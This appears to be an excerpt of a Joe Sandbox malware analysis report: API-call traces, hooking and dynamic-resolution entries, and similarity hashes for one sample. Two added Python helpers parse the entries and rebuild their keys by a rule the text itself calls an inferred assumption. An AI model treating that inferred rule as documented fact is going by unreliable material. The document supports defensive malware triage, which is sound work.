                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2582817389-0
                                                                                                    • Opcode ID: f0e344bbc04f92307ca198969832d623703823cd89f51f93640c6fdc7de57377
                                                                                                    • Instruction ID: e77b2b82fbab34af822627d8fd9f743af5e234b55baff62bc477d5bfd2d2bb14
                                                                                                    • Opcode Fuzzy Hash: f0e344bbc04f92307ca198969832d623703823cd89f51f93640c6fdc7de57377
                                                                                                    • Instruction Fuzzy Hash: 18F0375933631266CA24F6B99CC187B669C89447E178444A1FE42DF116D556CCC282B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0330252C
                                                                                                    • SetWindowsHookExA.USER32(00000003,033024D0,00000000,00000000), ref: 0330253C
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03302557
                                                                                                    • CreateThread.KERNEL32(00000000,000003E8,03302474,00000000,00000000), ref: 0330257B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1195359707-0
                                                                                                    • Opcode ID: da271c4956ff4aa469d690e14308d51d1eb9f265154d145e68cc2d86be64d74e
                                                                                                    • Instruction ID: c09f7bc2cab124a34963bf748188e5ae60cddbe45ca6fff5f449e05486c453d6
                                                                                                    • Opcode Fuzzy Hash: da271c4956ff4aa469d690e14308d51d1eb9f265154d145e68cc2d86be64d74e
                                                                                                    • Instruction Fuzzy Hash: 86F03A70780304AEFA64E7A09CEAB6636ACD704B15F109455F14AAE4C4C3F010C08F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
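
                                                                                                     The function entries above list each routine's API calls together with an "API ID" similarity key, but the report does not say how that key is derived, and the raw hook constant in the SetWindowsHookExA entry is left undecoded. The Python script below is an added example written for this page; it is not Joe Sandbox code or output. It parses trace lines copied verbatim from the palette entry and the SetWindowsHookExA entry above, rebuilds the API ID from them, and decodes the idHook argument. The derivation rule (split the API name on CamelCase, drop tokens shorter than four characters, group the rest by occurrence count with the most frequent group first, sort each group alphabetically, join groups with `$`) is an assumption inferred from the entries on this page: every token that disappears from a key (Get, Set, DC, Ex, Id, Pos, Sub) is three characters or shorter and every token that survives is four or longer. The "API String ID" hash is not reproduced because its algorithm is not shown anywhere on the page. Only the idHook slot is decoded, because the argument column is a static reconstruction and shows 00000000 for the hMod and dwThreadId slots, which cannot be taken at face value.

```python
"""Rebuild Joe Sandbox-style 'API ID' keys from function-entry trace lines and
decode the WH_* hook type passed to SetWindowsHookExA.

Added example for this report, not Joe Sandbox code. The grouping rule and the
four-character minimum token length are inferred from the entries on this page
and are an assumption, not a documented algorithm.
"""
import re
from collections import Counter

# Constructed sample input: trace lines copied from two function entries on this page.
PALETTE_ENTRY = """
  • Part of subcall function 032D2EA4: EnterCriticalSection.KERNEL32(033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EAC
  • Part of subcall function 032D2EA4: LeaveCriticalSection.KERNEL32(033303A0,033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EB9
  • Part of subcall function 032D2EA4: EnterCriticalSection.KERNEL32(00000038,033303A0,033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EC2
  • Part of subcall function 032D6164: GetDC.USER32(00000000), ref: 032D61BA
  • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
  • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
  • Part of subcall function 032D6164: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
  • Part of subcall function 032D6164: ReleaseDC.USER32(00000000,00000000), ref: 032D6208
• CreateCompatibleDC.GDI32(00000000), ref: 032D4D29
• SelectObject.GDI32(00000000,?), ref: 032D4D42
• SelectPalette.GDI32(00000000,?,000000FF), ref: 032D4D6B
• RealizePalette.GDI32(00000000), ref: 032D4D77
"""

HOOK_ENTRY = """
• GetCurrentThreadId.KERNEL32 ref: 0330252C
• SetWindowsHookExA.USER32(00000003,033024D0,00000000,00000000), ref: 0330253C
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03302557
• CreateThread.KERNEL32(00000000,000003E8,03302474,00000000,00000000), ref: 0330257B
"""

# One trace line: "<Api>.<Module>(<args>), ref: <addr>"; the argument list is optional.
_LINE_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)")
# CamelCase splitter that keeps acronyms whole: GetDC -> Get, DC; GetMenuItemID -> Get, Menu, Item, ID
_TOKEN_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+")

# WH_* hook ids from winuser.h (documented constants), only those needed for triage here.
WH_NAMES = {2: "WH_KEYBOARD", 3: "WH_GETMESSAGE", 4: "WH_CALLWNDPROC", 5: "WH_CBT",
            7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}


def parse_entry(text):
    """Return [(api, module, [args], ref)] for every trace line, subcall lines included."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.search(line)
        if not m:
            continue
        api, module, args, ref = m.groups()
        calls.append((api, module, args.split(",") if args else [], ref))
    return calls


def split_camel(name):
    """Split an API name into CamelCase tokens, keeping all-caps runs such as DC or ID intact."""
    return _TOKEN_RE.findall(name)


def api_id(calls, min_token_len=4):
    """Inferred rule: count name tokens of at least min_token_len characters, group
    them by count (highest first), sort each group alphabetically, join with '$'."""
    counts = Counter(tok for api, _, _, _ in calls
                     for tok in split_camel(api) if len(tok) >= min_token_len)
    by_freq = {}
    for tok, n in counts.items():
        by_freq.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


def hook_types(calls):
    """Decode idHook (first argument, a literal in the trace) of every SetWindowsHookExA/W call."""
    out = []
    for api, _, args, ref in calls:
        if api.startswith("SetWindowsHookEx") and args:
            n = int(args[0], 16)
            out.append((ref, WH_NAMES.get(n, f"WH_{n}")))
    return out


if __name__ == "__main__":
    print(api_id(parse_entry(PALETTE_ENTRY)))   # key printed in the palette entry above
    print(api_id(parse_entry(HOOK_ENTRY)))      # key printed in the hook entry above
    print(hook_types(parse_entry(HOOK_ENTRY)))  # [('0330253C', 'WH_GETMESSAGE')]
```

                                                                                                     Run against the two copied entries, the script reproduces the keys the report prints for them (CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease and CreateThread$CurrentEventHookWindows), which is what makes the key usable for pivoting between reports of related samples; check the remaining entries on this page the same way before relying on the inferred rule elsewhere. The hook decode resolves 00000003 to WH_GETMESSAGE, a message-queue hook; whether it is thread-local or system-wide depends on the dwThreadId argument, which this static trace does not resolve.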

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D7639
                                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 032D764B
                                                                                                    • GetTextMetricsA.GDI32(00000000), ref: 032D7656
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D7667
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2013942131-0
                                                                                                    • Opcode ID: 2bd7be2bd96ac37c156d23e079149301b8263c1a2b290f22f1d1d911c2d3f440
                                                                                                    • Instruction ID: e317152696c22e64e7062b846903acdbe4fe4f9f90c961197fe069376195d142
                                                                                                    • Opcode Fuzzy Hash: 2bd7be2bd96ac37c156d23e079149301b8263c1a2b290f22f1d1d911c2d3f440
                                                                                                    • Instruction Fuzzy Hash: E3E0865166277226D611F6AD5C81FEF795C8F12AE1F8C0291FD44AE3C0EA49DA8082F6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032D14F0: EnterCriticalSection.KERNEL32(?,032D152D), ref: 032D14F4
                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,032D2404,?,00000000,032D242C), ref: 032D233F
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 032D23E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                    • String ID: Default
                                                                                                    • API String ID: 249151401-753088835
                                                                                                    • Opcode ID: 17678613aac2bfc63c9e2751619864233e5925c22495dbae9edb9808251c4e9f
                                                                                                    • Instruction ID: 27764a9e5518b55f66627d53a2127534d2b21618751b23237b4a9899bd41e11c
                                                                                                    • Opcode Fuzzy Hash: 17678613aac2bfc63c9e2751619864233e5925c22495dbae9edb9808251c4e9f
                                                                                                    • Instruction Fuzzy Hash: F8616A34A24348DFDB15DFA8C984BDDBBF9EF49300F5844A5E840AB652C3B09A85CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cff4e48df611f8432e32e7190b9f924729c3185e44d56f2925c993a7594f00dc
                                                                                                    • Instruction ID: 30f682d791f67c40b7452328f2d36442e377847fdcc02b70d6506b74f17665f5
                                                                                                    • Opcode Fuzzy Hash: cff4e48df611f8432e32e7190b9f924729c3185e44d56f2925c993a7594f00dc
                                                                                                    • Instruction Fuzzy Hash: 36A1D6667307010BD718EA7C9CA43EDB3A59B847D1F2C427EE114CB395E7A8E9E58390
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,032BA6DA), ref: 032BA672
                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,032BA6DA), ref: 032BA678
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                    • String ID: yyyy
                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                    • Opcode ID: 736b539eebac56df5bfd908a2967199531dbcbbf7d2dc7260ecfb8d6e1aa5cf8
                                                                                                    • Instruction ID: 66608e5042a491425b4156477419fb2afe10d48a8995b0229b41a5f3f23f2c22
                                                                                                    • Opcode Fuzzy Hash: 736b539eebac56df5bfd908a2967199531dbcbbf7d2dc7260ecfb8d6e1aa5cf8
                                                                                                    • Instruction Fuzzy Hash: 7D2195B5A202189FCF14EF95C881AEEB3F8EF08780F4504A5E945EB251E7749EC0D7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$EqualIntersect
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3291753422-2766056989
                                                                                                    • Opcode ID: 9c7bf5dcfd9de15934f31ca30ef02c4e26b6de3393bbfac088c86ff44963cd1a
                                                                                                    • Instruction ID: e5422db597750669ae7307c8af074160e8088bcd91d4679d5ed8fc88a7fa3a0b
                                                                                                    • Opcode Fuzzy Hash: 9c7bf5dcfd9de15934f31ca30ef02c4e26b6de3393bbfac088c86ff44963cd1a
                                                                                                    • Instruction Fuzzy Hash: 2611E3356242486BCB01DA6CC884BEEBBECAF4A214F480291EC04DF341C771DD8587D0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DAF9E
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DAFB0
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: MonitorFromPoint
                                                                                                    • API String ID: 1792783759-1072306578
                                                                                                    • Opcode ID: 0a9d5f7d100a49dce31375c2e70441f82b65cfb56a446c7fe231251942c2363d
                                                                                                    • Instruction ID: 499b3e18f2c0642c86e9380347a03a7758501eee7ca175c891109d9f661a7835
                                                                                                    • Opcode Fuzzy Hash: 0a9d5f7d100a49dce31375c2e70441f82b65cfb56a446c7fe231251942c2363d
                                                                                                    • Instruction Fuzzy Hash: 4501AEB6618209AFEB04DF55D8C4F99B769EF44355F048055F916CF244C3729CC2CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DAE79
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DAE85
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: MonitorFromRect
                                                                                                    • API String ID: 1792783759-4033241945
                                                                                                    • Opcode ID: 39aa367652fa2c4e50c57a2f393cbc6130d2afed67f06fc3ea23787a81488c87
                                                                                                    • Instruction ID: 8f86f61db5f0e8e136e2971a7fb47fac92f5330a1f4c292e3f0f069b2f087ad7
                                                                                                    • Opcode Fuzzy Hash: 39aa367652fa2c4e50c57a2f393cbc6130d2afed67f06fc3ea23787a81488c87
                                                                                                    • Instruction Fuzzy Hash: 76014F71E142149FE724DB15D484F5ABB5AEB45351F088065E909CE205C37098C4CBF0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(?), ref: 032DAE02
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    • GetSystemMetrics.USER32(?), ref: 032DADC8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: GetSystemMetrics
                                                                                                    • API String ID: 1792783759-96882338
                                                                                                    • Opcode ID: 62358e1153076cf83402ad8e84ed5fed0d1585e6eba20755a8b2925f2fc58786
                                                                                                    • Instruction ID: a6e7703fb2b1f50c02e2c159025f138d9dea5ef04561db3f83a7a1c2f391dccd
                                                                                                    • Opcode Fuzzy Hash: 62358e1153076cf83402ad8e84ed5fed0d1585e6eba20755a8b2925f2fc58786
                                                                                                    • Instruction Fuzzy Hash: 4AF05970A383800FD724EA3CD8C4E73391EDB85332F148B60E1274A1DCC2B488C0C658
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyState.USER32(00000010), ref: 032E321B
                                                                                                    • GetKeyState.USER32(00000011), ref: 032E322C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State
                                                                                                    • String ID:
                                                                                                    • API String ID: 1649606143-3916222277
                                                                                                    • Opcode ID: 669905e1ecc03226cb31e3ba03f71be1a871f94f283114bc7ed63f0bda2a2c5f
                                                                                                    • Instruction ID: 5cbd7fe39f79f80ff4cb6d7faa78e4eecaeb7d0fae4e6c441708a0e5a9f46204
                                                                                                    • Opcode Fuzzy Hash: 669905e1ecc03226cb31e3ba03f71be1a871f94f283114bc7ed63f0bda2a2c5f
                                                                                                    • Instruction Fuzzy Hash: 08E0922E71078612FA12F56C2C017E757954F827B6F4C0AA6FFE42B0C1E6C70D9191A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 03308C74
                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 03308CA4
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 03308CC3
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 03308CCF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$Write
                                                                                                    • String ID:
                                                                                                    • API String ID: 3448952669-0
                                                                                                    • Opcode ID: 4edb68b7e19e9935cf9c109d26bd83859e5e216203624d26d438e705ded6ee2b
                                                                                                    • Instruction ID: e64aa52b6ea9552edf4712495ed505da94e8d64d46086dd740df5ef387f8e397
                                                                                                    • Opcode Fuzzy Hash: 4edb68b7e19e9935cf9c109d26bd83859e5e216203624d26d438e705ded6ee2b
                                                                                                    • Instruction Fuzzy Hash: 5521AFB5A417199BDF10CF18CDC0BAEB3B8EF40360F044151ED14AB384DB74E8518AA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
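The function blocks above all follow one fixed layout (an "APIs" list of `Name.MODULE(args), ref: ADDR` entries, optional "Part of subcall function" entries, and a "Similarity" section carrying the API ID, String ID, Opcode ID and fuzzy hashes). When a report runs to hundreds of such blocks it is faster to parse them than to read them. The parser below is an added example, not part of the Joe Sandbox report or of its IDA plugin; the sample excerpt it parses is constructed from three of the blocks shown above, and the three analysis helpers (an API histogram, a list of functions that resolve imports through GetProcAddress together with the string the report associated with them, and a list of functions that probe memory with IsBadReadPtr/IsBadWritePtr) are this example's own choices of what to pivot on, not fields the report defines.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                         # address of the call site as printed by the report
    subcall_of: str | None = None    # set when the report lists the call under "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""


# One "APIs" bullet, e.g.
#   • CreateFontIndirectA.GDI32(?), ref: 032D23E1
#   • Part of subcall function 032D14F0: EnterCriticalSection.KERNEL32(?,032D152D), ref: 032D14F4
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# The "Similarity" fields we keep; the key is normalised to the dataclass attribute name.
FIELD_RE = re.compile(r"^•\s*(?P<key>API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$")


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split report text into FunctionBlocks; a block ends at its 'Uniqueness Score' line."""
    blocks: list[FunctionBlock] = []
    cur = FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["name"], m["module"], m["args"].split(","), m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            setattr(cur, m["key"].lower().replace(" ", "_"), m["val"].strip())
            continue
        if line.startswith("Uniqueness Score:"):
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks


def api_histogram(blocks: list[FunctionBlock]) -> Counter:
    """How often each Win32 API is referenced across all listed functions."""
    return Counter(c.name for b in blocks for c in b.calls)


def dynamic_resolution(blocks: list[FunctionBlock]) -> list[tuple[str, str]]:
    """(opcode_id, string) for functions that reach GetProcAddress and carry a String ID.

    The string is the report's best hint at the export being resolved. Note that the
    MonitorFromPoint/MonitorFromRect/GetSystemMetrics resolutions on this page are the
    Delphi VCL's normal multi-monitor probing, so this list is a pivot, not a verdict.
    """
    return [(b.opcode_id, b.string_id) for b in blocks
            if b.string_id and any(c.name == "GetProcAddress" for c in b.calls)]


def probe_heavy(blocks: list[FunctionBlock],
                names: tuple[str, ...] = ("IsBadReadPtr", "IsBadWritePtr")) -> list[str]:
    """Opcode IDs of functions that call the pointer-probing APIs at least twice."""
    return [b.opcode_id for b in blocks if sum(c.name in names for c in b.calls) >= 2]


# Constructed excerpt: three blocks copied in the report's layout (fields not used here omitted).
SAMPLE = """\
APIs
  • Part of subcall function 032D14F0: EnterCriticalSection.KERNEL32(?,032D152D), ref: 032D14F4
• CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,032D2404,?,00000000,032D242C), ref: 032D233F
• CreateFontIndirectA.GDI32(?), ref: 032D23E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
Similarity
• API ID: CompareCreateCriticalEnterFontIndirectSectionString
• String ID: Default
• Opcode ID: 17678613aac2bfc63c9e2751619864233e5925c22495dbae9edb9808251c4e9f
• Instruction Fuzzy Hash: F8616A34A24348DFDB15DFA8C984BDDBBF9EF49300F5844A5E840AB652C3B09A85CB65
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(00000000), ref: 032DAF9E
• GetSystemMetrics.USER32(00000001), ref: 032DAFB0
  • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
Similarity
• API ID: MetricsSystem$AddressProc
• String ID: MonitorFromPoint
• Opcode ID: 0a9d5f7d100a49dce31375c2e70441f82b65cfb56a446c7fe231251942c2363d
Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 03308C74
• IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 03308CA4
• IsBadReadPtr.KERNEL32(?,00000008), ref: 03308CC3
Similarity
• API ID: Read$Write
• String ID:
• Opcode ID: 4edb68b7e19e9935cf9c109d26bd83859e5e216203624d26d438e705ded6ee2b
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print(api_histogram(parsed).most_common(5))
    print(dynamic_resolution(parsed))
    print(probe_heavy(parsed))
```

Feed it the text of a whole report and the Opcode IDs it returns can be searched across other reports to find the same functions in related samples; the Instruction Fuzzy Hash is the field to use when the function has been recompiled and the exact Opcode ID no longer matches.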

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.4%
                                                                                                    Dynamic/Decrypted Code Coverage:4.2%
                                                                                                    Signature Coverage:1.4%
                                                                                                    Total number of Nodes:357
                                                                                                    Total number of Limit Nodes:51

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 210 68ca44a-68ca44e 211 68ca47f-68ca496 210->211 212 68ca450-68ca479 call 68caf20 NtClose 210->212 214 68ca49c-68ca4bd 211->214 215 68ca497 call 68caf20 211->215 215->214
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(068C4D40,?,?,068C4D40,068B9CE3,FFFFFFFF), ref: 068CA475
                                                                                                    Memory Dump Source
